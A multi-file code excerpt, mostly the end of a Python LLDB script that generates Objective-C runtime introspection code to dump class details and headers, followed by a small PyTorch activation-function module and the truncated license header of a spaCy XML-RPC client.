*returnString = [NSMutableString string]; [returnString appendString:@"''' + modulePath + r'''\n************************************************************\n"]; // Properties NSMutableSet *exportedClassesSet = [NSMutableSet set]; NSMutableSet *exportedProtocolsSet = [NSMutableSet set]; unsigned int count = 0; const char **allClasses = (const char **)objc_copyClassNamesForImage("''' + modulePath + r'''", &count); NSMutableDictionary *returnDict = [NSMutableDictionary dictionaryWithCapacity:count]; for (int i = 0; i < count; i++) { Class cls = objc_getClass(allClasses[i]); NSMutableString *generatedProperties = [NSMutableString string]; NSMutableSet *blackListMethodNames = [NSMutableSet set]; [blackListMethodNames addObjectsFromArray:@[@".cxx_destruct", @"dealloc"]]; unsigned int propertyCount = 0; objc_property_t *properties = (objc_property_t *)class_copyPropertyList(cls, &propertyCount); NSCharacterSet *charSet = [NSCharacterSet characterSetWithCharactersInString:@","]; NSString *(^argumentBlock)(NSString *) = ^(NSString *arg) { if ([arg isEqualToString:@"@"]) { return @"id"; } else if ([arg isEqualToString:@"v"]) { return @"void"; } else if ([arg hasPrefix:@"{CGRect"]) { return @"CGRect"; } else if ([arg hasPrefix:@"{CGPoint"]) { return @"CGPoint"; } else if ([arg hasPrefix:@"{CGSize"]) { return @"CGSize"; } else if ([arg isEqualToString:@"q"]) { return @"NSInteger"; } else if ([arg isEqualToString:@"B"]) { return @"BOOL"; } else if ([arg isEqualToString:@":"]) { return @"SEL"; } else if ([arg isEqualToString:@"d"]) { return @"CGFloat"; } else if ([arg isEqualToString:@"@?"]) { // A block? return @"id"; } return @"void *"; }; NSMutableSet *blackListPropertyNames = [NSMutableSet setWithArray:@[@"hash", @"superclass", @"class", @"description", @"debugDescription"]]; for (int i = 0; i < propertyCount; i++) { objc_property_t property = properties[i]; NSString *attributes = [NSString stringWithUTF8String:(char *)property_getAttributes(property)]; NSString *name = [NSString stringWithUTF8String:(char *)property_getName(property)]; if ([blackListPropertyNames containsObject:name]) { continue; } NSMutableString *generatedPropertyString = [NSMutableString stringWithString:@"@property ("]; NSScanner *scanner = [[NSScanner alloc] initWithString:attributes]; [scanner setCharactersToBeSkipped:charSet]; BOOL multipleOptions = 0; NSString *propertyType; NSString *parsedInput; while ([scanner scanUpToCharactersFromSet:charSet intoString:&parsedInput]) { if ([parsedInput isEqualToString:@"N"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"nonatomic"]; multipleOptions = 1; } else if ([parsedInput isEqualToString:@"W"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"weak"]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"G"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:(NSString *)@"getter="]; [generatedPropertyString appendString:(NSString *)[parsedInput substringFromIndex:1]]; [blackListMethodNames addObject:[parsedInput substringFromIndex:1]]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"S"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:(NSString *)@"setter="]; [generatedPropertyString appendString:(NSString *)[parsedInput substringFromIndex:1]]; [blackListMethodNames addObject:[parsedInput substringFromIndex:1]]; multipleOptions = 1; } else if ([parsedInput isEqualToString:@"&"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"strong"]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"V"]) { // ivar name here, V_name } else if ([parsedInput hasPrefix:@"T"]) { // Type here, T@"NSString" if ( (BOOL)[[[parsedInput substringToIndex:2] substringFromIndex:1] isEqualToString: @"@"]) { // It's a NSObject NSString *tmpPropertyType = [parsedInput substringFromIndex:1]; NSArray *propertyComponents = [tmpPropertyType componentsSeparatedByString:@"\""]; if ([propertyComponents count] > 1) { NSString *component = (NSString *)[propertyComponents objectAtIndex:1]; component = [component stringByReplacingOccurrencesOfString:@"><" withString:@", "]; if ([component hasPrefix:@"<"]) { propertyType = (NSString *)[@"id" stringByAppendingString:component]; NSString *formatted = [[component stringByReplacingOccurrencesOfString:@"<" withString:@""] stringByReplacingOccurrencesOfString:@">" withString:@""]; for (NSString *f in [formatted componentsSeparatedByString:@", "]) { [exportedProtocolsSet addObject:f]; } } else { [exportedClassesSet addObject:component]; propertyType = (NSString *)[component stringByAppendingString:@"*"]; } } else { propertyType = @"id"; } } else { propertyType = argumentBlock([parsedInput substringFromIndex:1]); } } } [generatedPropertyString appendString:(NSString *)[(NSString *)[(NSString *)[(NSString *)[@") " stringByAppendingString:propertyType] stringByAppendingString:@" "] stringByAppendingString:name] stringByAppendingString:@";\n"]]; [generatedProperties appendString:generatedPropertyString]; [blackListMethodNames addObject:name]; } NSMutableArray *tmpSetArray = [NSMutableArray array]; for (NSString *propertyName in [blackListMethodNames allObjects]) { NSString *setter = (NSString *)[@"set" stringByAppendingString:(NSString *)[(NSString *)[(NSString *)[[propertyName substringToIndex:1] uppercaseString] stringByAppendingString:[propertyName substringFromIndex:1]] stringByAppendingString:@":"]]; [tmpSetArray addObject:setter]; } [blackListMethodNames addObjectsFromArray:tmpSetArray]; NSString *(^generateMethodsForClass)(Class) = ^(Class cls) { NSMutableString* generatedMethods = [NSMutableString stringWithString:@""]; unsigned int classCount = 0; Method *methods = (Method *)class_copyMethodList(cls, &classCount); NSString *classOrInstanceStart = (BOOL)class_isMetaClass(cls) ? @"+" : @"-"; for (int i = 0; i < classCount; i++) { Method m = methods[i]; NSString *methodName = NSStringFromSelector((char *)method_getName(m)); if ([blackListMethodNames containsObject:methodName]) { continue; } NSMutableString *generatedMethodString = [NSMutableString stringWithString:classOrInstanceStart]; char *retType = (char *)method_copyReturnType(m); NSString *retTypeString = [NSString stringWithUTF8String:retType]; free(retType); unsigned int arguments = (unsigned int)method_getNumberOfArguments(m); [generatedMethodString appendString:(NSString *)[(NSString *)[@"(" stringByAppendingString:argumentBlock(retTypeString)] stringByAppendingString:@")"]]; NSArray *methodComponents = [methodName componentsSeparatedByString:@":"]; NSMutableString *realizedMethod = [NSMutableString stringWithString:@""]; for (int j = 2; j < arguments; j++) { // id, sel, always int index = j - 2; [realizedMethod appendString:(NSString *)[methodComponents[index] stringByAppendingString:@":"]]; char *argumentType = (char *)method_copyArgumentType(m, j); NSString *argumentTypeString = [NSString stringWithUTF8String:argumentType]; free(argumentType); [realizedMethod appendString:(NSString *)[(NSString *)[@"(" stringByAppendingString:argumentBlock(argumentTypeString)] stringByAppendingString:@")"]]; [realizedMethod appendString:@"arg"]; [realizedMethod appendString:[@(index) stringValue]]; [realizedMethod appendString:@" "]; } [generatedMethodString appendString:realizedMethod]; if (arguments == 2) { [generatedMethodString appendString:methodName]; } [generatedMethods appendString:(NSString *)[generatedMethodString stringByAppendingString:@";\n"]]; } free(methods); return generatedMethods; }; // Instance Methods NSString *generatedInstanceMethods = generateMethodsForClass((Class)cls); // Class Methods Class metaClass = (Class)objc_getMetaClass((char *)class_getName(cls)); NSString *generatedClassMethods = generateMethodsForClass(metaClass); NSMutableString *finalString = [NSMutableString string]; [finalString appendString:(NSString *)[cls description]]; [finalString appendString:@" : "]; [finalString appendString:(NSString *)[[cls superclass] description]]; [finalString appendString:(NSString *)[[[generatedProperties componentsSeparatedByString:@"\n"] sortedArrayUsingSelector:@selector(compare:)] componentsJoinedByString:@"\n "]]; [finalString appendString:(NSString *)[[[[generatedClassMethods stringByReplacingOccurrencesOfString:@" ;" withString:@";"] componentsSeparatedByString:@"\n"] sortedArrayUsingSelector:@selector(compare:)] componentsJoinedByString:@"\n "]]; [finalString appendString:(NSString *)[[[[generatedInstanceMethods stringByReplacingOccurrencesOfString:@" ;" withString:@";"] componentsSeparatedByString:@"\n"] sortedArrayUsingSelector:@selector(compare:)] componentsJoinedByString:@"\n "]]; [finalString appendString:@"\n************************************************************\n"]; [returnDict setObject:(id _Nonnull)finalString forKey:(id _Nonnull)[cls description]]; // Free stuff free(properties); } NSArray *sortedKeys = [[returnDict allKeys] sortedArrayUsingSelector: @selector(compare:)]; NSMutableArray *sortedValues = [NSMutableArray array]; for (NSString *key in sortedKeys) { [returnString appendString:(NSString *)[returnDict objectForKey:key]]; } returnString; ''' return script def generate_class_info(options): if options.verbose_info and not options.info: options.info = options.verbose_info verboseOutput = True else: verboseOutput = False if '.' in options.info: classInfo = "(Class)NSClassFromString(@\"" + options.info + "\")" else: classInfo = "[" + options.info + " class]" script = "BOOL verboseOutput = {};\n".format("YES" if verboseOutput else "NO") script += r''' @import Foundation; @import ObjectiveC; #define RO_META (1<<0) // class is a root class #define RO_ROOT (1<<1) // class has .cxx_construct/destruct implementations #define RO_HAS_CXX_STRUCTORS (1<<2) // class has +load implementation // #define RO_HAS_LOAD_METHOD (1<<3) // class has visibility=hidden set #define RO_HIDDEN (1<<4) // class has attribute(objc_exception): OBJC_EHTYPE_$_ThisClass is non-weak #define RO_EXCEPTION (1<<5) // this bit is available for reassignment // #define RO_REUSE_ME (1<<6) // class compiled with ARC #define RO_IS_ARC (1<<7) // class has .cxx_destruct but no .cxx_construct (with RO_HAS_CXX_STRUCTORS) #define RO_HAS_CXX_DTOR_ONLY (1<<8) // class is not ARC but has ARC-style weak ivar layout #define RO_HAS_WEAK_WITHOUT_ARC (1<<9) // class is in an unloadable bundle - must never be set by compiler #define RO_FROM_BUNDLE (1<<29) // class is unrealized future class - must never be set by compiler #define RO_FUTURE (1<<30) // class is realized - must never be set by compiler #define RO_REALIZED (1<<31) // Values for class_rw_t->flags // These are not emitted by the compiler and are never used in class_ro_t. // Their presence should be considered in future ABI versions. // class_t->data is class_rw_t, not class_ro_t #define RW_REALIZED (1<<31) // class is unresolved future class #define RW_FUTURE (1<<30) // class is initialized #define RW_INITIALIZED (1<<29) // class is initializing #define RW_INITIALIZING (1<<28) // class_rw_t->ro is heap copy of class_ro_t #define RW_COPIED_RO (1<<27) // class allocated but not yet registered #define RW_CONSTRUCTING (1<<26) // class allocated and registered #define RW_CONSTRUCTED (1<<25) // available for use; was RW_FINALIZE_ON_MAIN_THREAD // #define RW_24 (1<<24) // class +load has been called #define RW_LOADED (1<<23) #if !SUPPORT_NONPOINTER_ISA // class instances may have associative references #define RW_INSTANCES_HAVE_ASSOCIATED_OBJECTS (1<<22) #endif // class has instance-specific GC layout #define RW_HAS_INSTANCE_SPECIFIC_LAYOUT (1 << 21) // available for use // #define RW_20 (1<<20) // class has started realizing but not yet completed it #define RW_REALIZING (1<<19) // NOTE: MORE RW_ FLAGS DEFINED BELOW // Values for class_rw_t->flags or class_t->bits // These flags are optimized for retain/release and alloc/dealloc // 64-bit stores more of them in class_t->bits to reduce pointer indirection. #if !__LP64__ // class or superclass has .cxx_construct implementation #define RW_HAS_CXX_CTOR (1<<18) // class or superclass has .cxx_destruct implementation #define RW_HAS_CXX_DTOR (1<<17) // class or superclass has default alloc/allocWithZone: implementation // Note this is is stored in the metaclass. #define RW_HAS_DEFAULT_AWZ (1<<16) // class's instances requires raw isa #if SUPPORT_NONPOINTER_ISA #define RW_REQUIRES_RAW_ISA (1<<15) #endif // class is a Swift class #define FAST_IS_SWIFT (1UL<<0) // class or superclass has default retain/release/autorelease/retainCount/ // _tryRetain/_isDeallocating/retainWeakReference/allowsWeakReference #define FAST_HAS_DEFAULT_RR (1UL<<1) // data pointer #define FAST_DATA_MASK 0xfffffffcUL #elif 1 // Leaks-compatible version that steals low bits only. // class or superclass has .cxx_construct implementation #define RW_HAS_CXX_CTOR (1<<18) // class or superclass has .cxx_destruct implementation #define RW_HAS_CXX_DTOR (1<<17) // class or superclass has default alloc/allocWithZone: implementation // Note this is is stored in the metaclass. #define RW_HAS_DEFAULT_AWZ (1<<16) // class is a Swift class #define FAST_IS_SWIFT (1UL<<0) // class or superclass has default retain/release/autorelease/retainCount/ // _tryRetain/_isDeallocating/retainWeakReference/allowsWeakReference #define FAST_HAS_DEFAULT_RR (1UL<<1) // class's instances requires raw isa #define FAST_REQUIRES_RAW_ISA (1UL<<2) // data pointer #define FAST_DATA_MASK 0x00007ffffffffff8UL #else // Leaks-incompatible version that steals lots of bits. // class is a Swift class #define FAST_IS_SWIFT (1UL<<0) // class's instances requires raw isa #define FAST_REQUIRES_RAW_ISA (1UL<<1) // class or superclass has .cxx_destruct implementation // This bit is aligned with isa_t->hasCxxDtor to save an instruction. #define FAST_HAS_CXX_DTOR (1UL<<2) // data pointer #define FAST_DATA_MASK 0x00007ffffffffff8UL // class or superclass has .cxx_construct implementation #define FAST_HAS_CXX_CTOR (1UL<<47) // class or superclass has default alloc/allocWithZone: implementation // Note this is is stored in the metaclass. #define FAST_HAS_DEFAULT_AWZ (1UL<<48) // class or superclass has default retain/release/autorelease/retainCount/ // _tryRetain/_isDeallocating/retainWeakReference/allowsWeakReference #define FAST_HAS_DEFAULT_RR (1UL<<49) // summary bit for fast alloc path: !hasCxxCtor and // !instancesRequireRawIsa and instanceSize fits into shiftedSize #define FAST_ALLOC (1UL<<50) // instance size in units of 16 bytes // or 0 if the instance size is too big in this field // This field must be LAST #define FAST_SHIFTED_SIZE_SHIFT 51 // FAST_ALLOC means // FAST_HAS_CXX_CTOR is set // FAST_REQUIRES_RAW_ISA is not set // FAST_SHIFTED_SIZE is not zero // FAST_ALLOC does NOT check FAST_HAS_DEFAULT_AWZ because that // bit is stored on the metaclass. #define FAST_ALLOC_MASK (FAST_HAS_CXX_CTOR | FAST_REQUIRES_RAW_ISA) #define FAST_ALLOC_VALUE (0) #endif #ifndef _DLFCN_H_ typedef struct dl_info { const char *dli_fname; /* Pathname of shared object */ void *dli_fbase; /* Base address of shared object */ const char *dli_sname; /* Name of nearest symbol */ void *dli_saddr; /* Address of nearest symbol */ } Dl_info; #endif // _DLFCN_H_ //*****************************************************************************/ #pragma mark - Methods //*****************************************************************************/ typedef struct method_t { char * name; const char *types; IMP imp; } method_t; typedef struct method_list_t { uint32_t entsizeAndFlags; uint32_t count; method_t *first; } method_list_t; typedef struct method_array_t { uint32_t count; method_list_t *methods; } method_array_t; //*****************************************************************************/ #pragma mark - Ivars //*****************************************************************************/ typedef struct ivar_t { #if __x86_64__ // *offset was originally 64-bit on some x86_64 platforms. // We read and write only 32 bits of it. // Some metadata provides all 64 bits. This is harmless for unsigned // little-endian values. // Some code uses all 64 bits. class_addIvar() over-allocates the // offset for their benefit. #endif int32_t *offset; const char *name; const char *type; // alignment is sometimes -1; use alignment() instead uint32_t alignment_raw; uint32_t size; } ivar_t; typedef struct ivar_list_t { uint32_t entsizeAndFlags; uint32_t count; ivar_t *first; } ivar_list_t; //*****************************************************************************/ #pragma mark - Properties //*****************************************************************************/ typedef struct property_t { const char *name; const char *attributes; } property_t; typedef struct property_list_t { uint32_t entsizeAndFlags; uint32_t count; property_t *first; } property_list_t; typedef struct property_array_t { uint32_t count; property_list_t *properties; } property_array_t; //*****************************************************************************/ #pragma mark - Protocols //*****************************************************************************/ typedef struct dsprotocol_t { uint32_t flags; uint32_t version; const char *name; // struct protocol_list_t *protocols; // method_list_t *instanceMethods; // method_list_t *classMethods; // method_list_t *optionalInstanceMethods; // method_list_t *optionalClassMethods; // property_list_t *instanceProperties; // uint32_t size; // sizeof(protocol_t) // uint32_t flags; // // Fields below this point are not always present on disk. // const char **_extendedMethodTypes; // const char *_demangledName; // property_list_t *_classProperties; } dsprotocol_t; typedef struct protocol_list_t { uintptr_t count; dsprotocol_t *first; } protocol_list_t; typedef struct protocol_array_t { uint32_t count; protocol_list_t *protocols; } protocol_array_t; //*****************************************************************************/ #pragma mark - Categories //*****************************************************************************/ typedef struct class_ro_t { uint32_t flags; uint32_t instanceStart; uint32_t instanceSize; #ifdef __LP64__ uint32_t reserved; #endif const uint8_t * ivarLayout; const char * name; method_list_t * baseMethodList; protocol_list_t * baseProtocols; ivar_list_t * ivars; uint8_t * weakIvarLayout; property_list_t *baseProperties; } class_ro_t; typedef struct class_rw_t { uint32_t flags; uint32_t version; const class_ro_t *ro; method_array_t methods; // redefined from method_array_t property_array_t properties; // redefined from property_array_t protocol_list_t protocols; // redefined from protocol_array_t struct dsobjc_class* firstSubclass; struct dsobjc_class* nextSiblingClass; char *demangledName; } class_rw_t; typedef struct dsobjc_class { struct dsobjc_class* isa; struct dsobjc_class* superclass; void *_buckets; // formerly cache pointer and vtable uint32_t _mask; uint32_t _occupied; uintptr_t bits; class_rw_t *ds_data() { return (class_rw_t *)(bits & FAST_DATA_MASK); } } dsobjc_class; typedef struct dsswift_class { struct dsobjc_class *isa; struct dsobjc_class *superclass; void *_buckets; void *maskAndOccupied; uintptr_t bits; uint32_t flags; uint32_t instanceAddressPoint; uint32_t instanceSize; uint16_t instanceAlignMask; uint16_t runtimeReservedBits; uint32_t classSize; uint32_t classAddressPoint; uintptr_t typeDescriptor; uintptr_t ivarDestroyer; uintptr_t *methods; class_rw_t *ds_data() { return (class_rw_t *)(bits & FAST_DATA_MASK); } } dsswift_class; dsobjc_class *dsclass = (dsobjc_class*)''' + classInfo + r'''; dsobjc_class *dsclass_meta = (dsobjc_class*)object_getClass((Class)dsclass); uint32_t roflags = dsclass->ds_data()->ro->flags; uint32_t rwflags = dsclass->ds_data()->flags; const char* name = dsclass->ds_data()->ro->name; const char* superclassName = dsclass->superclass ? dsclass->superclass->ds_data()->ro->name : nil; property_list_t *bprops = dsclass->ds_data()->ro->baseProperties; protocol_list_t *bprot = dsclass->ds_data()->ro->baseProtocols; method_list_t *bmeth = dsclass->ds_data()->ro->baseMethodList; ivar_list_t *bivar = dsclass->ds_data()->ro->ivars; NSMutableString *returnString = [NSMutableString new]; if (verboseOutput) { [returnString appendString:@"\n******************************************\n"]; [returnString appendString:@" "]; [returnString appendString:[NSString stringWithUTF8String:(char *)name]]; if (superclassName && (roflags & RO_META)) { [returnString appendString:@" : (META)"]; } else if (superclassName) { [returnString appendString:@" : "]; [returnString appendString:[NSString stringWithUTF8String:(char *)superclassName]]; } [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" (%p)", dsclass]]; [returnString appendString:@"\n******************************************\n\n"]; [returnString appendString:@"Found in: "]; [returnString appendString:[NSString stringWithUTF8String:(char *)class_getImageName((Class)dsclass)]]; [returnString appendString:@"\n\n"]; [returnString appendString:@"Swift:\t\t\t"]; [returnString appendString:dsclass->bits & FAST_IS_SWIFT ? @"YES\n" : @"NO\n" ]; [returnString appendString:@"Size:\t\t\t"]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"0x%x bytes", dsclass->ds_data()->ro->instanceSize]]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\nInstance Start:\t0x%x", dsclass->ds_data()->ro->instanceStart]]; [returnString appendString:@"\nMeta:\t\t\t"]; [returnString appendString:(BOOL)class_isMetaClass((Class)dsclass) ? @"YES" : @"NO"];; [returnString appendString:@"\n\n"]; /////////////////////////////////////////////////////////////////// [returnString appendString:@"Protocols: "]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t\t%d\t%p\n", bprot ? bprot->count : 0, bprot ? &bprot->first : 0]]; [returnString appendString:@"Ivars: "]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t\t\t%d\t%p\n", bivar ? bivar->count : 0, bivar ? &bivar->first : 0]]; [returnString appendString:@"Properties: "]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t%d\t%p\n", bprops ? bprops->count : 0, bprops ? &bprops->first : 0]]; if (!(roflags & RO_META)) { [returnString appendString:@"I ObjC Meth: "]; } else { [returnString appendString:@"C ObjC Meth: "]; } [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t%d\t%p\n", bmeth ? bmeth->count : 0, bmeth ? &bmeth->first : 0]]; if (!(roflags & RO_META) && NSClassFromString(@"UIView") && dsclass_meta) { // Cocoa's isa layout is different? method_list_t *classmeth = dsclass_meta->ds_data()->ro->baseMethodList; [returnString appendString:@"C ObjC Meth: "]; [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"\t%d\t%p\n", classmeth ? classmeth->count : 0, classmeth ? &classmeth->first : 0]]; } /////////////////////////////////////////////////////////////////// [returnString appendString:@"\nRW Flags:\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_REALIZED) ? @"1" : @"0"]; [returnString appendString:@"\tRW_REALIZED\t\t\tclass is realized\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_FUTURE) ? @"1" : @"0"]; [returnString appendString:@"\tRW_FUTURE\t\t\tclass is unresolved future class\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_INITIALIZED) ? @"1" : @"0"]; [returnString appendString:@"\tRW_INITIALIZED\t\tclass is initialized\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_INITIALIZING) ? @"1" : @"0"]; [returnString appendString:@"\tRW_INITIALIZING\t\tclass is initializing\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_COPIED_RO) ? @"1" : @"0"]; [returnString appendString:@"\tRW_COPIED_RO\t\tclass_rw_t->ro is heap copy of class_ro_t\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_CONSTRUCTING) ? @"1" : @"0"]; [returnString appendString:@"\tRW_CONSTRUCTING\t\tclass allocated but not yet registered\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_CONSTRUCTED) ? @"1" : @"0"]; [returnString appendString:@"\tRW_CONSTRUCTED\t\tclass allocated and registered\n"]; [returnString appendString:@" "]; [returnString appendString:(rwflags & RW_LOADED) ? @"1" : @"0"]; [returnString appendString:@"\tRW_LOADED\t\t\tclass +load has been called\n"]; ///////////////////////////////////////////////////////////////////// [returnString appendString:@"\nRO Flags:\n"]; [returnString appendString:@" "]; [returnString appendString:(roflags & RO_META) ? @"1" : @"0"]; [returnString appendString:@"\tRO_META\t\t\t\tclass is a metaclass\n"]; [returnString appendString:@" "]; [returnString appendString: roflags & RO_ROOT ? @"1" : @"0"]; [returnString appendString:@"\tRO_ROOT\t\t\t\tclass is a root class\n"]; [returnString appendString:@" "]; [returnString appendString: roflags & RO_HAS_CXX_STRUCTORS ? @"1" : @"0"]; [returnString appendString:@"\tRO_HAS_CXX_STRUCTORS\tclass has .cxx_construct/destruct implementations\n"]; [returnString appendString:@" "]; [returnString appendString: roflags & RO_HIDDEN ? @"1": @"0"]; [returnString appendString:@"\tRO_HIDDEN\t\t\t\tclass has visibility=hidden set\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_EXCEPTION ? @"1" : @"0"]; [returnString appendString:@"\tRO_EXCEPTION\t\t\tclass has attribute(objc_exception): OBJC_EHTYPE_$_ThisClass is non-weak\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_IS_ARC ? @"1" : @"0"]; [returnString appendString:@"\tRO_IS_ARC\t\t\t\tclass compiled with ARC\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_HAS_CXX_DTOR_ONLY ? @"1" : @"0"]; [returnString appendString:@"\tRO_HAS_CXX_DTOR_ONLY\tclass has .cxx_destruct but no .cxx_construct (with RO_HAS_CXX_STRUCTORS)\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_HAS_WEAK_WITHOUT_ARC ? @"1" : @"0"]; [returnString appendString:@"\tRO_HAS_WEAK_WITHOUT_ARC\tclass is not ARC but has ARC-style weak ivar layout\n"]; [returnString appendString:@" "]; [returnString appendString:roflags & RO_FROM_BUNDLE ? @"1" : @"0"]; [returnString appendString:@"\tRO_FROM_BUNDLE\t\tclass is in an unloadable bundle - must never be set by compiler\n"]; [returnString appendString:@" "]; [returnString appendFormat:roflags & RO_FUTURE ? @"1" : @"0"]; [returnString appendFormat:@"\tRO_FUTURE\t\t\tclass is unrealized future class - must never be set by compiler\n"]; [returnString appendString:@" "]; [returnString appendFormat:roflags & RO_REALIZED ? @"1" : @"0"]; [returnString appendFormat:@"\tRO_REALIZED\t\t\tclass is realized - must never be set by compiler\n"]; } [returnString appendFormat:@"\n@interface "]; [returnString appendString:[NSString stringWithUTF8String:(char *)name]]; [returnString appendString:@" : "]; if (superclassName) { [returnString appendString:[NSString stringWithUTF8String:(char *)superclassName]]; } if (bprot) { [returnString appendString:@" <"]; for (int i = 0; i < bprot->count; i++) { dsprotocol_t **pp = (&bprot->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"%s", pp[i]->name]]; if (i < (bprot->count - 1)) { [returnString appendString:@", "]; } } [returnString appendString:@">"]; } [returnString appendString:@"\n{\n"]; if (bivar) { for (int i = 0; i < bivar->count; i++) { ivar_t *dsiv = (ivar_t *)(&bivar->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" %20s %-30s; offset 0x%x, 0x%x\n", (char *)dsiv[i].type, (char *)dsiv[i].name, *(int32_t *)dsiv[i].offset, (int)dsiv[i].size]]; } } [returnString appendString:@"}\n\n"]; if (bprops) { for (int i = 0; i < bprops->count; i++) { property_t *dsiv = (property_t *)(&bprops->first); [returnString appendString:@"@property "]; [returnString appendString:[NSString stringWithUTF8String:(char *)dsiv[i].attributes]]; [returnString appendString:@" *"]; [returnString appendString:[NSString stringWithUTF8String:(char *)dsiv[i].name]]; [returnString appendString:@"\n"]; } } [returnString appendString:@"\n"]; if (bmeth) { for (int i = 0; i < bmeth->count; i++) { NSString *methodType = (BOOL)class_isMetaClass((Class)dsclass) ? @"+" : @"-"; method_t *mt = (method_t*)(&bmeth->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" %s%40s %p\n", [methodType UTF8String], mt[i].name, mt[i].imp]]; } if ((BOOL)class_isMetaClass((Class)dsclass) == NO) { dsobjc_class* dsmetaclass = (dsobjc_class*)objc_getMetaClass(name); method_list_t *bmetameth = dsmetaclass->ds_data()->ro->baseMethodList; if (bmetameth) { for (int i = 0; i < bmetameth->count; i++) { NSString *methodType = (BOOL)class_isMetaClass((Class)dsmetaclass) ? @"+" : @"-"; method_t *mt = (method_t*)(&bmetameth->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" %s%40s %p\n", [methodType UTF8String], mt[i].name, mt[i].imp]]; } } } } if (!(roflags & RO_META) && NSClassFromString(@"UIView") && dsclass_meta) { // Cocoa's isa is different? TODO method_list_t *classmeth = dsclass_meta->ds_data()->ro->baseMethodList; if (classmeth) { for (int i = 0; i < classmeth->count; i++) { method_t *mt = (method_t*)(&classmeth->first); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@" +%40s %p\n", mt[i].name, mt[i].imp]]; } } } if (dsclass->bits & FAST_IS_SWIFT) { dsswift_class *dsswiftcls = (dsswift_class*)dsclass; unsigned long methodsAddress = (unsigned long)&dsswiftcls->methods; unsigned long endAddress = (unsigned long)dsswiftcls + dsswiftcls->classSize - dsswiftcls->classAddressPoint; int methodCount = ((int)(endAddress - methodsAddress)) / sizeof(uintptr_t*); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"Swift methods: %d\n", methodCount]]; for (int i = 0; i < methodCount; i++) { uintptr_t * ptr = (uintptr_t*)methodsAddress; Dl_info dsinfo = {}; dladdr((void*)ptr[i], (Dl_info *)&dsinfo); [returnString appendString:(NSString*)[[NSString alloc] initWithFormat:@"(%p) %s\n", ptr[i], dsinfo.dli_sname]]; } } [returnString appendString:@"\n"]; [returnString appendString:@"@end\n"]; returnString; ''' return script def generate_option_parser(): usage = "usage: %prog [options] /optional/path/to/executable/or/bundle" parser = optparse.OptionParser(usage=usage, prog="dump_classes") parser.add_option("-f", "--filter", action="store", default=None, dest="filter", help="List all the classes in the module that are subclasses of class. -f UIView") parser.add_option("-m", "--module", action="store", default=None, dest="module", help="Filter class by module. You only need to give the module name and not fullpath") parser.add_option("-r", "--regular_expression", action="store", default=None, dest="regular_expression", help="Search the available classes using a regular expression search") parser.add_option("-t", "--class_type", action="store", default=None, dest="class_type", help="Specifies the class type, only supports \"objc\" or \"swift\"") parser.add_option("-v", "--verbose", action="store_true", default=False, dest="verbose", help="Enables verbose mode for dumping classes. Doesn't work w/ -g or -p") parser.add_option("-g", "--generate_header", action="store_true", default=False, dest="generate_header", help="Generate a header for the specified class. -h UIView") parser.add_option("-P", "--generate_protocol", action="store_true", default=False, dest="generate_protocol", help="Generate a protocol that you can cast to any object") parser.add_option("-o", "--dump_code_output", action="store_true", default=False, dest="dump_code_output", help="Dump all classes and code per module, use \"__all\" to dump all ObjC modules known to proc") parser.add_option("-l", "--search_protocols", action="store_true", default=False, dest="search_protocols", help="Search for protocols instead of ObjC classes") parser.add_option("-p", "--conforms_to_protocol", action="store", default=None, dest="conforms_to_protocol", help="Only returns the classes that conforms to a particular protocol") parser.add_option("-s", "--superclass", action="store", default=None, dest="superclass", help="Returns only if the parent class is of type") parser.add_option("-i", "--info", action="store", default=None, dest="info", help="Get the info about a Objectie-C class, i.e. dclass -i UIViewController") parser.add_option("-I", "--verbose_info", action="store", default=None, dest="verbose_info", help="Get the info about a Objectie-C class, i.e. dclass -i UIViewController") return parser ckconv/nn/activation_functions.py # torch import torch from ckconv.nn.misc import Expression def Swish(): """ out = x * sigmoid(x) """ return Expression(lambda x: x * torch.sigmoid(x)) def Sine(): """ out = sin(x) """ return Expression(lambda x: torch.sin(x)) dcavar/spacyxmlrpc #!/usr/bin/env python3 # -*- coding: UTF-8 -*- """ spacyRPCClient.py (C) 2017 by <> In LingData use SentenceData to store properties of sentences and all tokens The output of the Spacy pipeline is a sequence of sentences, plus correference of elements across sentences. This code represents a XML-RPC client for the SpacyRPC server. \copyright Copyright 2017 by \license{Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for 